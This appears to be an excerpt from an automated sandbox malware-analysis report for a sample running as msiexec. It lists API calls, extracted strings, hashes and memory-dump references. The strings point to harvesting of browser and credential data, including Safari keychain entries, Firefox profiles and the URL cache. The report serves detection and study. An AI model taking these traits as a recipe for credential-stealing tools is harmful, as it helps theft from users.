                                                                                            • memcpy.MSVCRT(?,?,00000011), ref: 0040269B
                                                                                              • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                                                              • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                                            • memcpy.MSVCRT(?,?,0000001C,?,?,00000000,?), ref: 004026FF
                                                                                            • LocalFree.KERNEL32(?,?,?,00000000,?,?,00000000,?), ref: 00402764
                                                                                            • FreeLibrary.KERNEL32(00000000,?,?,00000000,?), ref: 00402775
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: _wcsicmp$Freememcpy$Library$AddressLocalProcmemsetwcslen
                                                                                            • String ID: !$#$$$&$&$'$)$/$0$2$8$=$>$>$@$A$Account$Data$F$H$H$I$K$K$L$O$Path$S$X$\$^$`$a$b$com.apple.Safari$com.apple.WebKit2WebProcess$g$h$n$n$q$server$t$t$t$u$u$w$y$y$z${$}$~
                                                                                            • API String ID: 577499730-1134094380
                                                                                            • Opcode ID: dd22fc70d251945153f84157bbedf09d5f9a0a96f25b2184ec3973dd1390e5a3
                                                                                            • Instruction ID: 24bcbd005531c38afe4d7004bd238553ea51a424b60caac2517de9c8923e7683
                                                                                            • Opcode Fuzzy Hash: dd22fc70d251945153f84157bbedf09d5f9a0a96f25b2184ec3973dd1390e5a3
                                                                                            • Instruction Fuzzy Hash: 8FE1F32010C7C19DD332D678884978BBFD45BA7328F484B9EF1E89A2D2D7B98509C767
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: _wcsicmpmemset$_wcsnicmpwcslen$ByteCharMultiWidewcschrwcscpy$memcpystrchrstrlen
                                                                                            • String ID: :stringdata$ftp://$http://$https://
                                                                                            • API String ID: 2787044678-1921111777
                                                                                            • Opcode ID: 5cfdb451540a99f12352c14b787623eda213fcfbf47060a2a7a9031bc80669e4
                                                                                            • Instruction ID: 1dd8f84a331a8d1f0195812dc1f06ff326a48265e58e3ad24d859c5fcdf3acb9
                                                                                            • Opcode Fuzzy Hash: 5cfdb451540a99f12352c14b787623eda213fcfbf47060a2a7a9031bc80669e4
                                                                                            • Instruction Fuzzy Hash: C191C571540219AEEF10EF65DC82EEF776DEF41318F01016AF948B7181EA38ED518BA9
                                                                                            APIs
                                                                                            • GetDlgItem.USER32(?,000003E9), ref: 0041402F
                                                                                            • GetDlgItem.USER32(?,000003E8), ref: 0041403B
                                                                                            • GetWindowLongW.USER32(00000000,000000F0), ref: 0041404A
                                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00414056
                                                                                            • GetWindowLongW.USER32(00000000,000000EC), ref: 0041405F
                                                                                            • GetWindowLongW.USER32(?,000000EC), ref: 0041406B
                                                                                            • GetWindowRect.USER32(00000000,?), ref: 0041407D
                                                                                            • GetWindowRect.USER32(?,?), ref: 00414088
                                                                                            • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041409C
                                                                                            • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004140AA
                                                                                            • GetDC.USER32 ref: 004140E3
                                                                                            • wcslen.MSVCRT ref: 00414123
                                                                                            • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 00414134
                                                                                            • ReleaseDC.USER32(?,?), ref: 00414181
                                                                                            • _snwprintf.MSVCRT ref: 00414244
                                                                                            • SetWindowTextW.USER32(?,?), ref: 00414258
                                                                                            • SetWindowTextW.USER32(?,00000000), ref: 00414276
                                                                                            • GetDlgItem.USER32(?,00000001), ref: 004142AC
                                                                                            • GetWindowRect.USER32(00000000,?), ref: 004142BC
                                                                                            • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004142CA
                                                                                            • GetClientRect.USER32(?,?), ref: 004142E1
                                                                                            • GetWindowRect.USER32(?,?), ref: 004142EB
                                                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 00414331
                                                                                            • GetClientRect.USER32(?,?), ref: 0041433B
                                                                                            • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 00414373
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Release_snwprintfwcslen
                                                                                            • String ID: %s:$EDIT$STATIC
                                                                                            • API String ID: 2080319088-3046471546
                                                                                            • Opcode ID: 4cffa952f3a039c60e8efdb869f217de44d75a47fa5f06f0d0d0713d1b76c38a
                                                                                            • Instruction ID: eff71af8639f47ea0b7533f6321954d8b94ad3b67000e3ed03306cc56154d199
                                                                                            • Opcode Fuzzy Hash: 4cffa952f3a039c60e8efdb869f217de44d75a47fa5f06f0d0d0713d1b76c38a
                                                                                            • Instruction Fuzzy Hash: F8B1DF71108301AFD721DFA9C985E6BBBF9FF88704F004A2DF69582261DB75E9448F16
                                                                                            APIs
                                                                                            • EndDialog.USER32(?,?), ref: 00413221
                                                                                            • GetDlgItem.USER32(?,000003EA), ref: 00413239
                                                                                            • SendMessageW.USER32(00000000,000000B1,00000000,0000FFFF), ref: 00413257
                                                                                            • SendMessageW.USER32(?,00000301,00000000,00000000), ref: 00413263
                                                                                            • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 0041326B
                                                                                            • memset.MSVCRT ref: 00413292
                                                                                            • memset.MSVCRT ref: 004132B4
                                                                                            • memset.MSVCRT ref: 004132CD
                                                                                            • memset.MSVCRT ref: 004132E1
                                                                                            • memset.MSVCRT ref: 004132FB
                                                                                            • memset.MSVCRT ref: 00413310
                                                                                            • GetCurrentProcess.KERNEL32 ref: 00413318
                                                                                            • ReadProcessMemory.KERNEL32(00000000,?,00000080,00000000), ref: 0041333B
                                                                                            • ReadProcessMemory.KERNEL32(?,?,00000080,00000000), ref: 0041336D
                                                                                            • memset.MSVCRT ref: 004133C0
                                                                                            • GetCurrentProcessId.KERNEL32 ref: 004133CE
                                                                                            • memcpy.MSVCRT(?,0045AA90,0000021C), ref: 004133FC
                                                                                            • wcscpy.MSVCRT ref: 0041341F
                                                                                            • _snwprintf.MSVCRT ref: 0041348E
                                                                                            • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004134A6
                                                                                            • GetDlgItem.USER32(?,000003EA), ref: 004134B0
                                                                                            • SetFocus.USER32(00000000), ref: 004134B7
                                                                                            Strings
                                                                                            • Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X, xrefs: 00413483
                                                                                            • {Unknown}, xrefs: 004132A6
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_snwprintfmemcpywcscpy
                                                                                            • String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X${Unknown}
                                                                                            • API String ID: 4111938811-1819279800
                                                                                            • Opcode ID: 97bbb4bd5fc40a2980dfba304632497cbec8fb91d9ab00b7ac9f2109681e0e22
                                                                                            • Instruction ID: fb691a4f2f0ee0f23db40d54bf7b3fb7beca904c55697b54c7815e943e903c38
                                                                                            • Opcode Fuzzy Hash: 97bbb4bd5fc40a2980dfba304632497cbec8fb91d9ab00b7ac9f2109681e0e22
                                                                                            • Instruction Fuzzy Hash: A97182B280021DBFEB219F51DC45EEA3B7CFB08355F0440B6F508A6161DB799E948F69
                                                                                            APIs
                                                                                            • GetDlgItem.USER32(?,000003EC), ref: 004011F0
                                                                                            • ChildWindowFromPoint.USER32(?,?,?), ref: 00401202
                                                                                            • GetDlgItem.USER32(?,000003EE), ref: 00401238
                                                                                            • ChildWindowFromPoint.USER32(?,?,?), ref: 00401245
                                                                                            • GetDlgItem.USER32(?,000003EC), ref: 00401273
                                                                                            • ChildWindowFromPoint.USER32(?,?,?), ref: 00401285
                                                                                            • GetModuleHandleW.KERNEL32(00000000,?,?), ref: 0040128E
                                                                                            • LoadCursorW.USER32(00000000,00000067), ref: 00401297
                                                                                            • SetCursor.USER32(00000000,?,?), ref: 0040129E
                                                                                            • GetDlgItem.USER32(?,000003EE), ref: 004012BF
                                                                                            • ChildWindowFromPoint.USER32(?,?,?), ref: 004012CC
                                                                                            • GetDlgItem.USER32(?,000003EC), ref: 004012E6
                                                                                            • SetBkMode.GDI32(?,00000001), ref: 004012F2
                                                                                            • SetTextColor.GDI32(?,00C00000), ref: 00401300
                                                                                            • GetSysColorBrush.USER32(0000000F), ref: 00401308
                                                                                            • GetDlgItem.USER32(?,000003EE), ref: 00401329
                                                                                            • EndDialog.USER32(?,?), ref: 0040135E
                                                                                            • DeleteObject.GDI32(?), ref: 0040136A
                                                                                            • GetDlgItem.USER32(?,000003ED), ref: 0040138F
                                                                                            • ShowWindow.USER32(00000000), ref: 00401398
                                                                                            • GetDlgItem.USER32(?,000003EE), ref: 004013A4
                                                                                            • ShowWindow.USER32(00000000), ref: 004013A7
                                                                                            • SetDlgItemTextW.USER32(?,000003EE,0045D778), ref: 004013B8
                                                                                            • SetWindowTextW.USER32(?,00000000), ref: 004013CA
                                                                                            • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004013E2
                                                                                            • SetDlgItemTextW.USER32(?,000003EC,?), ref: 004013F3
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogHandleLoadModeModuleObject
                                                                                            • String ID:
                                                                                            • API String ID: 829165378-0
                                                                                            • Opcode ID: 19a332b7149b8c9d9d3d6ff7d6a76f82ec59d5834f8b717de0dd62f1513d673f
                                                                                            • Instruction ID: caa3714a391556dce09a7e5fb0b25e31ef738818e6d8753142f97b5ec5ee2caf
                                                                                            • Opcode Fuzzy Hash: 19a332b7149b8c9d9d3d6ff7d6a76f82ec59d5834f8b717de0dd62f1513d673f
                                                                                            • Instruction Fuzzy Hash: 0051B134500708AFEB32AF61DC85E6E7BB9FB44301F10093AF552A61F1C7B9A991DB19
                                                                                            APIs
                                                                                            • memset.MSVCRT ref: 00404172
                                                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                              • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                              • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                              • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                            • wcscpy.MSVCRT ref: 004041D6
                                                                                            • wcscpy.MSVCRT ref: 004041E7
                                                                                            • memset.MSVCRT ref: 00404200
                                                                                            • memset.MSVCRT ref: 00404215
                                                                                            • _snwprintf.MSVCRT ref: 0040422F
                                                                                            • wcscpy.MSVCRT ref: 00404242
                                                                                            • memset.MSVCRT ref: 0040426E
                                                                                            • memset.MSVCRT ref: 004042CD
                                                                                            • memset.MSVCRT ref: 004042E2
                                                                                            • _snwprintf.MSVCRT ref: 004042FE
                                                                                            • wcscpy.MSVCRT ref: 00404311
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: memset$wcscpy$_snwprintfwcslen$AttributesFilewcscat
                                                                                            • String ID: AE$General$IsRelative$Path$Profile%d$profiles.ini$EA
                                                                                            • API String ID: 2454223109-1580313836
                                                                                            • Opcode ID: 14b0d88d68d2695e792434069e0167c5559d7d25d781ac3d9655dfb0e2d65502
                                                                                            • Instruction ID: 5f54f20862f9259acc4f568515dc65a5c395277ecd0331c6beb9e3a358a2eb32
                                                                                            • Opcode Fuzzy Hash: 14b0d88d68d2695e792434069e0167c5559d7d25d781ac3d9655dfb0e2d65502
                                                                                            • Instruction Fuzzy Hash: 18512FB294012CBADB20EB55DC45ECFB7BCBF55744F0040E6B50CA2142EA795B84CFAA
                                                                                            APIs
                                                                                              • Part of subcall function 0040D407: LoadMenuW.USER32(00000000), ref: 0040D40F
                                                                                            • SetMenu.USER32(?,00000000), ref: 00411453
                                                                                            • SendMessageW.USER32(00000000,00000404,00000001,?), ref: 00411486
                                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 00411495
                                                                                            • LoadImageW.USER32(00000000,00000068,00000000,00000000,00000000,00009060), ref: 004114A2
                                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 004114D9
                                                                                            • CreateWindowExW.USER32(00000000,SysListView32,00000000,50810809,00000000,00000000,00000190,000000C8,?,00000103,00000000,00000000), ref: 00411500
                                                                                            • memcpy.MSVCRT(?,?,00002008,/nosaveload,00000000,00000001), ref: 004115C8
                                                                                            • ShowWindow.USER32(?,?), ref: 004115FE
                                                                                            • GetFileAttributesW.KERNEL32(0045E078), ref: 0041162F
                                                                                            • GetTempPathW.KERNEL32(00000104,0045E078), ref: 0041163F
                                                                                            • RegisterClipboardFormatW.USER32(commdlg_FindReplace), ref: 0041167A
                                                                                            • SendMessageW.USER32(?,00000404,00000002,?), ref: 004116B4
                                                                                            • SendMessageW.USER32(?,0000040B,00001001,00000000), ref: 004116C7
                                                                                              • Part of subcall function 00404592: wcslen.MSVCRT ref: 004045AF
                                                                                              • Part of subcall function 00404592: SendMessageW.USER32(?,00001061,?,?), ref: 004045D3
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: MessageSend$HandleLoadMenuModuleWindow$AttributesClipboardCreateFileFormatImagePathRegisterShowTempmemcpywcslen
                                                                                            • String ID: /nosaveload$SysListView32$commdlg_FindReplace$report.html$xE
                                                                                            • API String ID: 4054529287-3175352466
                                                                                            • Opcode ID: 80e2c4da556a6dfda94225f517483429c905b521daebd2f44f7cad3fe39d77d4
                                                                                            • Instruction ID: 800f7bfcdfcb1fd3e7c20450dd8eb4425a557a8a4e928c852398501c1500280f
                                                                                            • Opcode Fuzzy Hash: 80e2c4da556a6dfda94225f517483429c905b521daebd2f44f7cad3fe39d77d4
                                                                                            • Instruction Fuzzy Hash: CBA1A271640388AFEB11DF69CC89FCA3FA5AF55304F0404B9FE48AF292C6B59548CB65
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: wcscat$_snwprintfmemset$wcscpy
                                                                                            • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                                                                                            • API String ID: 3143752011-1996832678
                                                                                            • Opcode ID: 054461c97bc12b3ac6a6f5d4f147efcfafa35783d9cb78a1f9dd62ddbda29cb0
                                                                                            • Instruction ID: fbd97de1ae08b3d7bb58c913f73a739646adbf5bc1eafa8de66ed769fffaada2
                                                                                            • Opcode Fuzzy Hash: 054461c97bc12b3ac6a6f5d4f147efcfafa35783d9cb78a1f9dd62ddbda29cb0
                                                                                            • Instruction Fuzzy Hash: 25310BB2500315BEE720AA55AC82DBF73BC9F81728F10815FF614621C2EB3C5A854A1D
                                                                                            APIs
                                                                                            • GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                                                                            • GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
                                                                                            • GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
                                                                                            • GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
                                                                                            • GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
                                                                                            • GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
                                                                                            • GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
                                                                                            • GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
                                                                                            • GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressProc$HandleModule
                                                                                            • String ID: NtLoadDriver$NtOpenSymbolicLinkObject$NtQueryObject$NtQuerySymbolicLinkObject$NtQuerySystemInformation$NtResumeProcess$NtSuspendProcess$NtUnloadDriver$ntdll.dll
                                                                                            • API String ID: 667068680-2887671607
                                                                                            • Opcode ID: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                                                                                            • Instruction ID: 8dd6b0f06cc06780b82abcfa5335c49c30c65db347d43124f897848efd9f6b7c
                                                                                            • Opcode Fuzzy Hash: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                                                                                            • Instruction Fuzzy Hash: 8C015E75D48324AACB339F75AD09A053FB1EF04797B1004B7A80492266DAF9815CDE4C
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: _snwprintfmemset$wcscpy$wcscat
                                                                                            • String ID: bgcolor="%s"$ nowrap$&nbsp;$</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
                                                                                            • API String ID: 1607361635-601624466
                                                                                            • Opcode ID: 014fce8712d2099ed920d1c21251e5be9fb3fd75ebba54fa6feefa75023380bc
                                                                                            • Instruction ID: 75b7dc7a1ab43caf41f6bee0dc73fa500ed8492db64f50ed133d22c14cecb56c
                                                                                            • Opcode Fuzzy Hash: 014fce8712d2099ed920d1c21251e5be9fb3fd75ebba54fa6feefa75023380bc
                                                                                            • Instruction Fuzzy Hash: 09619F71900208BFDF25EF54CC86EAE7BB9FF44310F1040AAF805A7296DB399A59CB55
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: _snwprintf$memset$wcscpy
                                                                                            • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                                                                            • API String ID: 2000436516-3842416460
                                                                                            • Opcode ID: 3adec529592eaa12cbb3371149c11df059df1660bb42a65f2cf1cf9995de4c18
                                                                                            • Instruction ID: 0effb7443b15cd0e53e626898d2c9f551e6481245c02f09bcd1282082c9ffe88
                                                                                            • Opcode Fuzzy Hash: 3adec529592eaa12cbb3371149c11df059df1660bb42a65f2cf1cf9995de4c18
                                                                                            • Instruction Fuzzy Hash: C74163B194021D7AEB20EF55DC46EEB73BCFF45304F0440ABB908A2141E7759B988F66
                                                                                            APIs
                                                                                              • Part of subcall function 0041083A: memset.MSVCRT ref: 0041087D
                                                                                              • Part of subcall function 0041083A: memset.MSVCRT ref: 00410892
                                                                                              • Part of subcall function 0041083A: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                                                                                              • Part of subcall function 0041083A: SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                                                                                              • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                                                                                              • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                                                                                              • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                                                                                              • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                                                                                              • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                                                                                              • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                                                                                              • Part of subcall function 0041083A: GetSysColor.USER32(0000000F), ref: 00410999
                                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 004035BF
                                                                                            • LoadIconW.USER32(00000000,00000072), ref: 004035CA
                                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 004035DF
                                                                                            • LoadIconW.USER32(00000000,00000074), ref: 004035E4
                                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 004035F3
                                                                                            • LoadIconW.USER32(00000000,00000073), ref: 004035F8
                                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 00403607
                                                                                            • LoadIconW.USER32(00000000,00000075), ref: 0040360C
                                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 0040361B
                                                                                            • LoadIconW.USER32(00000000,0000006F), ref: 00403620
                                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 0040362F
                                                                                            • LoadIconW.USER32(00000000,00000076), ref: 00403634
                                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 00403643
                                                                                            • LoadIconW.USER32(00000000,00000077), ref: 00403648
                                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 00403657
                                                                                            • LoadIconW.USER32(00000000,00000070), ref: 0040365C
                                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 0040366B
                                                                                            • LoadIconW.USER32(00000000,00000078), ref: 00403670
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: HandleLoadModule$Icon$ImageMessageSendmemset$ColorDirectoryFileInfoWindows
                                                                                            • String ID:
                                                                                            • API String ID: 1043902810-0
                                                                                            • Opcode ID: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                                                                                            • Instruction ID: 42406aa8c1b655767e81280a563d2f976f29c17d6cb42a8b032fada3297a07e5
                                                                                            • Opcode Fuzzy Hash: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                                                                                            • Instruction Fuzzy Hash: B1212EA0B857087AF63137B2DC4BF7B7A5EDF81B89F214410F35C990E0C9E6AC108929
                                                                                            APIs
                                                                                              • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                                                                              • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                                                                            • free.MSVCRT ref: 0040E49A
                                                                                              • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                                                                            • memset.MSVCRT ref: 0040E380
                                                                                              • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                                                                              • Part of subcall function 0040AA29: memcpy.MSVCRT(?,?,00000000,00000001,00401B3C,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040AA5B
                                                                                            • wcschr.MSVCRT ref: 0040E3B8
                                                                                            • memcpy.MSVCRT(?,-00000121,00000008,0044E518,00000000,00000000,75922EE0), ref: 0040E3EC
                                                                                            • memcpy.MSVCRT(?,-00000121,00000008,0044E518,00000000,00000000,75922EE0), ref: 0040E407
                                                                                            • memcpy.MSVCRT(?,-00000220,00000008,0044E518,00000000,00000000,75922EE0), ref: 0040E422
                                                                                            • memcpy.MSVCRT(?,-00000220,00000008,0044E518,00000000,00000000,75922EE0), ref: 0040E43D
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: memcpy$_wcsicmpmemset$freewcschrwcslen
                                                                                            • String ID: $AccessCount$AccessedTime$CreationTime$EntryID$ExpiryTime$ModifiedTime$Url
                                                                                            • API String ID: 3849927982-2252543386
                                                                                            • Opcode ID: c30480054a5ca474dc40abe6212bc187cfeb1b733cbf080f7a891c76daa1d321
                                                                                            • Instruction ID: 3bb3cf654da2d90f893253d259683e8481abe175d229eeda5eb464894a91a1db
                                                                                            • Opcode Fuzzy Hash: c30480054a5ca474dc40abe6212bc187cfeb1b733cbf080f7a891c76daa1d321
                                                                                            • Instruction Fuzzy Hash: DA512071E00309ABDF10EFA6DC45B9EB7B8AF54305F15443BA904F7291E678AA14CB58
                                                                                            APIs
                                                                                            • ??2@YAPAXI@Z.MSVCRT(?,?,0040DC1B,?,00000000), ref: 0044480A
                                                                                            • _snwprintf.MSVCRT ref: 0044488A
                                                                                            • wcscpy.MSVCRT ref: 004448B4
                                                                                            • ??3@YAXPAX@Z.MSVCRT(00000000,00000000,?,OriginalFileName,00000000,?,LegalCopyright,00000000,?,InternalName,00000000,?,CompanyName,00000000,?,ProductVersion), ref: 00444964
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: ??2@??3@_snwprintfwcscpy
                                                                                            • String ID: %4.4X%4.4X$040904E4$CompanyName$FileDescription$FileVersion$InternalName$LegalCopyright$OriginalFileName$ProductName$ProductVersion$\VarFileInfo\Translation
                                                                                            • API String ID: 2899246560-1542517562
                                                                                            • Opcode ID: 3a239dc6c08d9031e3d9f47b17c09bde30fef5e8f92df5b66a56ab6f901ce2f0
                                                                                            • Instruction ID: ddb1140ba30d93f946c39142265044aeba6ebe712c4753dd77c76fa61262b17a
                                                                                            • Opcode Fuzzy Hash: 3a239dc6c08d9031e3d9f47b17c09bde30fef5e8f92df5b66a56ab6f901ce2f0
                                                                                            • Instruction Fuzzy Hash: 434127B2900218BAD704EFA1DC82DDEB7BCBF49305B110167BD05B3152DB78A655CBE8
                                                                                            APIs
                                                                                            • memset.MSVCRT ref: 0040DBCD
                                                                                            • memset.MSVCRT ref: 0040DBE9
                                                                                              • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                                                              • Part of subcall function 004447D9: ??2@YAPAXI@Z.MSVCRT(?,?,0040DC1B,?,00000000), ref: 0044480A
                                                                                              • Part of subcall function 004447D9: _snwprintf.MSVCRT ref: 0044488A
                                                                                              • Part of subcall function 004447D9: wcscpy.MSVCRT ref: 004448B4
                                                                                            • wcscpy.MSVCRT ref: 0040DC2D
                                                                                            • wcscpy.MSVCRT ref: 0040DC3C
                                                                                            • wcscpy.MSVCRT ref: 0040DC4C
                                                                                            • EnumResourceNamesW.KERNEL32(?,00000004,Function_0000D957,00000000), ref: 0040DCB1
                                                                                            • EnumResourceNamesW.KERNEL32(?,00000005,Function_0000D957,00000000), ref: 0040DCBB
                                                                                            • wcscpy.MSVCRT ref: 0040DCC3
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
